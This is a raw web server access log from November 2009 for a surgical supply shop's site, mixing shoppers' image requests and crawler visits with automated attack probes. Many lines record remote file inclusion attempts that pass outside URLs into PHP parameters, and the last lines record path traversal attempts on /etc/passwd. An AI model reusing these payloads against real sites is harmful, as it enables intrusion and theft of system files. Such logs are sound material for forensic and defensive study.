202.131.226.52 - - [13/Nov/2009:01:13:53 -0500] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:13:53 -0500] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://www.hochsauerlandferien.de/nw/data/images/id1.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.182.62.35 - - [13/Nov/2009:01:14:11 -0500] "GET /logs/access_log.Q109052300%20/templates/errors.php?error=http://www.portlandraiders.org/images/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
66.235.124.132 - - [13/Nov/2009:01:15:24 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [13/Nov/2009:01:15:24 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [13/Nov/2009:01:15:24 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [13/Nov/2009:01:15:24 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://acesurgical.com/home.html" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
77.221.130.17 - - [13/Nov/2009:01:15:36 -0500] "GET /logs/error_log.Q109100300//uks_board_v3010/modify_comment.php?dir=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:01:15:36 -0500] "GET //uks_board_v3010/modify_comment.php?dir=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:01:15:36 -0500] "GET /logs//uks_board_v3010/modify_comment.php?dir=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:01:15:36 -0500] "GET /logs/access_log.Q109100300//uks_board_v3010/modify_comment.php?dir=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:01:15:41 -0500] "GET /logs/error_log.Q109100300//uks_board_v3010/modify_comment.php?dir=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:01:15:41 -0500] "GET //uks_board_v3010/modify_comment.php?dir=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:01:15:42 -0500] "GET /logs//uks_board_v3010/modify_comment.php?dir=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 238 "-" "libwww-perl/5.805"
77.221.130.17 - - [13/Nov/2009:01:15:42 -0500] "GET /logs/access_log.Q109100300//uks_board_v3010/modify_comment.php?dir=http://www.muprosgame.com///kampret/rocks.txt?? HTTP/1.1" 404 260 "-" "libwww-perl/5.805"
222.236.47.182 - - [13/Nov/2009:01:15:45 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:15:45 -0500] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:15:46 -0500] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:15:46 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 200 25813 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:15:55 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:15:55 -0500] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:15:56 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:15:56 -0500] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:15:58 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:15:58 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:15:58 -0500] "GET /logs/access_log.Q109091500//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
116.127.121.116 - - [13/Nov/2009:01:15:58 -0500] "GET /logs/access_log.Q109101400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.backkarriere.de/templates/css/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:16:24 -0500] "GET /logs/access_log.Q109080200//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:16:24 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:16:24 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:16:35 -0500] "GET /logs/access_log.Q109072400//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:16:43 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:16:43 -0500] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:16:43 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 200 25813 "-" "Mozilla/5.0"
216.244.59.30 - - [13/Nov/2009:01:18:03 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:03 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:03 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:03 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
222.236.47.182 - - [13/Nov/2009:01:18:06 -0500] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
222.236.47.182 - - [13/Nov/2009:01:18:06 -0500] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
66.249.68.145 - - [13/Nov/2009:01:18:23 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0152A25B104152005D7B086+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.244.59.30 - - [13/Nov/2009:01:18:44 -0500] "GET /cgi-bin/lansaweb?procfun+wordpr01+webfunc+%20M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS%20(S0040):01 HTTP/1.1" 200 49495 "http://www.acesurgical.com/rcm6.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:46 -0500] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:48 -0500] "GET /images/blend.jpg HTTP/1.1" 200 405 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:48 -0500] "GET /images/items/5096000_THUMB.JPG HTTP/1.1" 200 2069 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:48 -0500] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:48 -0500] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
216.244.59.30 - - [13/Nov/2009:01:18:49 -0500] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+ M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S004):01+RNCLAS(S0040):10+RNSUBS (S0040):01" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; PeoplePal 6.6) w:PACBHO60"
194.177.97.97 - - [13/Nov/2009:01:19:14 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 237 "-" "-"
194.177.97.97 - - [13/Nov/2009:01:19:14 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 232 "-" "-"
194.177.97.97 - - [13/Nov/2009:01:19:14 -0500] "GET /logs/access_log.Q109061600%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.nopaste.pl/Source/hbb.txt?&mode=id HTTP/1.1" 404 260 "-" "-"
202.131.226.52 - - [13/Nov/2009:01:19:14 -0500] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.131.226.52 - - [13/Nov/2009:01:19:19 -0500] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
123.125.66.67 - - [13/Nov/2009:01:20:11 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
209.59.12.99 - - [13/Nov/2009:01:21:08 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
220.181.7.125 - - [13/Nov/2009:01:22:11 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
69.175.14.34 - - [13/Nov/2009:01:22:19 -0500] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:22:19 -0500] "GET /components/com_forum/download.php?phpbb_root_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:22:19 -0500] "GET /logs/access_log.Q109090100/components/com_forum/download.php?phpbb_root_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
69.175.14.34 - - [13/Nov/2009:01:22:19 -0500] "GET /logs/access_log.Q109072200/components/com_forum/download.php?phpbb_root_path=http://econ1.nida.ac.th/review/view1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
117.58.251.130 - - [13/Nov/2009:01:22:58 -0500] "GET /index.php?inc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 207 "-" "-"
117.58.251.130 - - [13/Nov/2009:01:22:58 -0500] "GET /logs/index.php?inc=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 212 "-" "-"
117.58.251.130 - - [13/Nov/2009:01:22:59 -0500] "GET /index.php?inc=./../../../../../../../../etc/passwd HTTP/1.1" 404 207 "-" "-"
117.58.251.130 - - [13/Nov/2009:01:22:59 -0500] "GET /logs/index.php?inc=./../../../../../../../../etc/passwd HTTP/1.1" 404 212 "-" "-"
